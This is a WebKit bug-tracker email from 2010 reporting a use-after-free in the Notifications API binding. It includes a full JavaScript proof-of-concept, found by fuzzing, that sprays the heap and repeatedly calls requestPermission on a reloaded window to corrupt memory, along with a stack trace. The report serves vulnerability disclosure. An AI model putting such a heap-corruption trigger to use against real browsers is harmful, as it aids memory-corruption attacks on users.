[Webkit-unassigned] [Bug 43295] New: cross_fuzz notification memory corruption
bugzilla-daemon at webkit.org
bugzilla-daemon at webkit.org
Sat Jul 31 03:28:00 PDT 2010
https://bugs.webkit.org/show_bug.cgi?id=43295
Summary: cross_fuzz notification memory corruption
Product: WebKit
Version: 528+ (Nightly build)
Platform: PC
OS/Version: Windows Vista
Status: NEW
Severity: Major
Priority: P1
Component: HTML DOM
AssignedTo: webkit-unassigned at lists.webkit.org
ReportedBy: skylined at chromium.org
CC: eric at webkit.org
Blocks: 42959
This is a variation of bug 31886 (https://bugs.webkit.org/show_bug.cgi?id=31886). It was found by CrossFuzz, my port of Michal Zalewski's cross_fuzz:
<script>
function go() {
var target_window = window.open("about:blank");
var notification = target_window.webkitNotifications;
target_window.location.reload();
setInterval(function () {
heap_corrupt();
notification.requestPermission();
}, 1);
}
function heap_corrupt() {
var a = [];
for(var i = 0; i < 0x100; i++) {
try {
if (i < 0x10) a.push(new WebGLByteArray(Math.pow(2, i)));
a.push(new WebGLByteArray());
} catch (e) {}
a.push(Array(i).join('A'));
}
delete a;
try {gc()} catch(e) {}
}
go();
</script>
It causes the code in WebCore::V8NotificationCenter::requestPermissionCallback to reuse freed memory.
stack: WebCore::V8NotificationCenter::requestPermissionCallback
v8::internal::HandleApiCallHelper<...>
v8::internal::Builtin_HandleApiCall
v8::internal::Invoke
v8::internal::Execution::Call
...
http://trac.webkit.org/browser/trunk/WebCore/bindings/v8/custom/V8NotificationCenterCustom.cpp#L87
Safari does not seem to implement WebKit notifications (yet), so I'll file a Chromium bug for this too.
--
Configure bugmail: https://bugs.webkit.org/userprefs.cgi?tab=email
------- You are receiving this mail because: -------
You are the assignee for the bug.
More information about the webkit-unassigned
mailing list